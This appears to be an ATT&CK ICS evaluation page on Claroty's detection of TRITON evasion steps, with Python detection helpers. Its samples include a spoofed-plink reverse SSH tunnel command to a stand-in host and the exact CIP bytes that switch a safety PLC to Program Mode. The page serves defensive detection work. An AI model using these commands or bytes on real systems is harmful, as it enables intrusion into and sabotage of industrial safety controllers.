ICS participant Claroty, TRITON: Evasion (TA0103)

| Step | ATT&CK Pattern |
| --- | --- |
| 3.A.1 | Masquerading (T0849) |
| 4.A.1 | Masquerading (T0849) |
| 4.B.1 | Masquerading (T0849) |
| 5.A.1 | Masquerading (T0849) |
| 6.B.1 | Masquerading (T0849) |
| 6.C.1 | Masquerading (T0849) |
| 6.D.1 | Masquerading (T0849) |
| 6.E.1 | Masquerading (T0849) |
| 8.A.1 | Masquerading (T0849) |
| 11.A.1 | Masquerading (T0849) |
| 11.C.1 | Masquerading (T0849) |
| 14.B.1 | Masquerading (T0849) |
| 17.B.1 | Masquerading (T0849) |
| 19.B.1 | Masquerading (T0849) |
| 22.A.2 | Change Operating Mode (T0858) |
Criteria

3.A.1: Evidence that the newly created files copied from the RDP shared folder into the control EWS Temp SMB directory are not legitimate ("SMBClient.exe", "SMB_Sync.xml", and "SMB_Update.xml").

4.A.1: Evidence that the scheduled task "SMB_sync.xml" is not legitimate and was imported into Task Scheduler (the task executes a spoofed plink executable to initiate a reverse SSH tunnel).

4.B.1: Evidence that the "SMBClient.exe" process is not legitimate (the binary is a spoofed plink.exe used to create an SSH tunnel and redirect ports).

5.A.1: Evidence that the newly created files from the extraction of "csp3.zip" in the Temp Rockwell directory are not legitimate ("csp.exe", "Install-csp.ps1", "csp-agent.exe", "sftp.exe", etc.).

6.B.1: Evidence that the "rockwell-csp3" service is not legitimate (the service is a spoofed sshd, created and then started via Start-Service).

6.C.1: Evidence that the "csp-agent" service is not legitimate (the service is a spoofed ssh-agent, created and then started via Start-Service).

6.D.1: Evidence that the scheduled task "SMB_update.xml" is not legitimate and was imported into Task Scheduler (the task executes a spoofed plink executable to initiate a reverse SSH tunnel).

6.E.1: Evidence that the "SMBClient.exe" process is not legitimate (the binary is a spoofed plink.exe used to create an SSH tunnel and redirect ports).

8.A.1: Evidence that the newly created files from the extraction of "RSLINX_install.zip" in the Temp Rockwell RSLINX directory are not legitimate ("RSLINX.exe" and "LogixMap.exe").

11.A.1: Evidence that the newly created files from the extraction of "RSLINX_install.zip" in the Temp Rockwell RSLINX directory are not legitimate ("RSLINX.exe" and "LogixMap.exe").

11.C.1: Evidence that the services "rockwell-csp3" and "csp-agent" are not legitimate (the underlying binaries are a spoofed sshd and a spoofed ssh-agent respectively, created and then started via Start-Service).

14.B.1: Evidence that the newly created files from the extraction of "RSLINX_install.zip" in the Temp Rockwell RSLINX directory are not legitimate ("RSLINX.exe" and "LogixMap.exe").

17.B.1: Evidence that the newly created files from the extraction of "Install_RSLogix.zip" in the Temp Rockwell RSLogix directory are not legitimate ("RSLogix5000.exe", "RSComms.exe", etc.).

19.B.1: Evidence that the newly created files from the extraction of "Install_GuardLogix.zip" in the Temp Rockwell GuardLogix directory are not legitimate ("RSLogix5000.exe", "RSComms.exe", "abRSA.exe", etc.).
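The scheduled-task and service criteria above all reduce to one check: a binary dropped under a Temp directory under a vendor-looking name (SMBClient.exe, csp.exe, csp-agent.exe) that does not match what the binary says about itself in its own version resource, started by an imported task or a freshly created service. The Python below is an added triage helper written for this page; it is not Claroty's detection logic and not part of the evaluation. The task XML, the OriginalFilename values, the flag list and the Temp-path heuristic are this example's assumptions: on a live EWS the XML would come from schtasks /Query /XML and the version fields from the file's PE version resource (for instance (Get-Item $path).VersionInfo in PowerShell).

```python
"""Triage helper for the Masquerading (T0849) criteria: does a scheduled-task or
service binary match its own version resource, and do its arguments look like a
plink-style SSH tunnel?  Added example; the sample XML and version data are constructed."""
import shlex
import xml.etree.ElementTree as ET
from pathlib import PureWindowsPath

TASK_NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}

# Switches that set up SSH port forwarding in plink/ssh (this list is an assumption).
TUNNEL_FLAGS = {"-R", "-L", "-D", "-N"}

# Constructed sample of what an exported task such as SMB_sync.xml could contain.
SAMPLE_TASK_XML = """<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Triggers><LogonTrigger><Enabled>true</Enabled></LogonTrigger></Triggers>
  <Actions Context="Author">
    <Exec>
      <Command>C:\\Windows\\Temp\\SMB\\SMBClient.exe</Command>
      <Arguments>-ssh -batch -N -pw hunter2 -R 4444:127.0.0.1:4444 svc@203.0.113.10</Arguments>
    </Exec>
  </Actions>
</Task>"""

# Constructed version-resource data keyed by lower-cased path.  On a live host this
# comes from the PE version resource, e.g. (Get-Item $path).VersionInfo in PowerShell.
SAMPLE_VERSION_INFO = {
    r"c:\windows\temp\smb\smbclient.exe": {"OriginalFilename": "Plink"},
    r"c:\windows\temp\rockwell\csp.exe": {"OriginalFilename": "sshd.exe"},
}


def task_exec_actions(xml_text: str) -> list:
    """Return (command, arguments) for every <Exec> action in Task Scheduler XML."""
    root = ET.fromstring(xml_text)
    actions = []
    for exec_el in root.findall(".//t:Actions/t:Exec", TASK_NS):
        cmd = exec_el.findtext("t:Command", default="", namespaces=TASK_NS).strip()
        args = exec_el.findtext("t:Arguments", default="", namespaces=TASK_NS).strip()
        actions.append((cmd, args))
    return actions


def assess_exec_action(command: str, arguments: str, version_info: dict) -> list:
    """Findings for one command line; an empty list means nothing suspicious."""
    findings = []
    path = PureWindowsPath(command)
    orig = version_info.get(str(path).lower(), {}).get("OriginalFilename", "")
    if orig and PureWindowsPath(orig).stem.lower() != path.stem.lower():
        findings.append(f"name_mismatch: {path.name} carries OriginalFilename {orig!r}")
    # posix=False keeps backslashes and quotes the way cmd.exe would see them.
    tokens = set(shlex.split(arguments, posix=False))
    if tokens & TUNNEL_FLAGS:
        findings.append("tunnel_flags: " + " ".join(sorted(tokens & TUNNEL_FLAGS)))
    if "-R" in tokens:
        findings.append("remote_forward: -R opens a listener on the SSH server forwarded back into this host")
    if "-pw" in tokens:
        findings.append("cleartext_password: -pw on the command line")
    return findings


def assess_task(xml_text: str, version_info: dict) -> dict:
    """Map each Exec command line in the task to its findings."""
    return {f"{cmd} {args}".strip(): assess_exec_action(cmd, args, version_info)
            for cmd, args in task_exec_actions(xml_text)}


def assess_service(name: str, image_path: str, version_info: dict) -> list:
    """Same version-resource check for a service binary, plus a location check."""
    findings = assess_exec_action(image_path, "", version_info)
    if "\\temp\\" in image_path.lower():
        findings.append(f"temp_location: service {name!r} runs from {image_path}")
    return findings


if __name__ == "__main__":
    for cmdline, findings in assess_task(SAMPLE_TASK_XML, SAMPLE_VERSION_INFO).items():
        print(cmdline, *("  ! " + f for f in findings), sep="\n")
    print(*assess_service("rockwell-csp3", r"C:\Windows\Temp\Rockwell\csp.exe",
                          SAMPLE_VERSION_INFO), sep="\n")
```

The OriginalFilename check is the cheapest signal here because a renamed plink.exe or sshd.exe keeps its version resource unless the adversary also patches it; the argument heuristics catch the tunnel even when the resource has been scrubbed, and the Temp-path check covers the services, which have no arguments to inspect.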
22.A.2: Evidence of the safety PLC operating mode being switched to Program Mode following an adversary CIP request to instance 0x01 of class 0x8E using service 0x07.
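The 22.A.2 criterion names the request precisely enough to reconstruct its bytes on the wire. The Python below is an added example, not part of this page and not Claroty's product code: it encodes and decodes a CIP explicit request using the standard EPATH logical-segment rules (8-bit class segment 0x20, 8-bit instance segment 0x24, path length counted in 16-bit words) and flags the service 0x07 / class 0x8E / instance 0x01 pattern in a constructed list of requests. The sample requests, the vendor-specific-class heuristic, and the assumption that the bytes have already been unwrapped from their EtherNet/IP encapsulation (SendRRData and the CPF unconnected data item) are all this example's, not the page's.

```python
"""Encode, decode and flag the CIP request from step 22.A.2: service 0x07 to
instance 0x01 of class 0x8E.  Added example with constructed sample requests;
input is the CIP request after EtherNet/IP encapsulation has been stripped."""
from dataclasses import dataclass
from typing import List, Tuple

SEG_CLASS_8, SEG_CLASS_16 = 0x20, 0x21
SEG_INST_8, SEG_INST_16 = 0x24, 0x25

# Vendor-specific object class range in the CIP object model; 0x8E falls inside it.
VENDOR_CLASS_RANGE = range(0x64, 0xC8)
READ_SERVICES = {0x01, 0x0E}  # Get_Attributes_All, Get_Attribute_Single


@dataclass(frozen=True)
class CipRequest:
    service: int
    class_id: int
    instance_id: int
    data: bytes = b""


def _logical_segment(seg8: int, seg16: int, value: int) -> bytes:
    if value <= 0xFF:
        return bytes([seg8, value])
    # 16-bit logical segments carry a pad byte so the value stays word-aligned.
    return bytes([seg16, 0x00]) + value.to_bytes(2, "little")


def encode_cip_request(req: CipRequest) -> bytes:
    path = (_logical_segment(SEG_CLASS_8, SEG_CLASS_16, req.class_id)
            + _logical_segment(SEG_INST_8, SEG_INST_16, req.instance_id))
    return bytes([req.service, len(path) // 2]) + path + req.data


def decode_cip_request(buf: bytes) -> CipRequest:
    service, words = buf[0], buf[1]
    path, data = buf[2:2 + 2 * words], buf[2 + 2 * words:]
    class_id = instance_id = None
    i = 0
    while i < len(path):
        seg = path[i]
        if seg in (SEG_CLASS_8, SEG_INST_8):
            value, i = path[i + 1], i + 2
        elif seg in (SEG_CLASS_16, SEG_INST_16):
            value, i = int.from_bytes(path[i + 2:i + 4], "little"), i + 4
        else:
            raise ValueError(f"unsupported path segment 0x{seg:02x}")
        if seg in (SEG_CLASS_8, SEG_CLASS_16):
            class_id = value
        else:
            instance_id = value
    if class_id is None or instance_id is None:
        raise ValueError("request path lacks a class or instance segment")
    return CipRequest(service, class_id, instance_id, bytes(data))


def is_safety_mode_change(req: CipRequest) -> bool:
    """Exactly the request named in 22.A.2."""
    return req.service == 0x07 and req.class_id == 0x8E and req.instance_id == 0x01


def flag_requests(stream: List[bytes]) -> List[Tuple[CipRequest, str]]:
    """Decode each request and return those worth an alert, with a reason."""
    out = []
    for raw in stream:
        req = decode_cip_request(raw)
        if is_safety_mode_change(req):
            out.append((req, "safety PLC mode change (22.A.2 pattern)"))
        elif req.class_id in VENDOR_CLASS_RANGE and req.service not in READ_SERVICES:
            out.append((req, "non-read service sent to a vendor-specific class"))
    return out


# Constructed sample stream: a routine identity read, then the 22.A.2 request.
SAMPLE_STREAM = [
    bytes.fromhex("01 02 20 01 24 01"),  # Get_Attributes_All on Identity (class 0x01)
    bytes.fromhex("07 02 20 8e 24 01"),  # service 0x07 -> class 0x8E, instance 0x01
]

if __name__ == "__main__":
    for req, why in flag_requests(SAMPLE_STREAM):
        print(f"service=0x{req.service:02x} class=0x{req.class_id:02x} "
              f"instance=0x{req.instance_id:02x}: {why}")
```

The exact-match rule is what the criterion asks for; the second rule is broader and will fire on legitimate engineering traffic to vendor-specific classes, so in practice it belongs on a watchlist keyed to the safety controller's address rather than as a blanket alert.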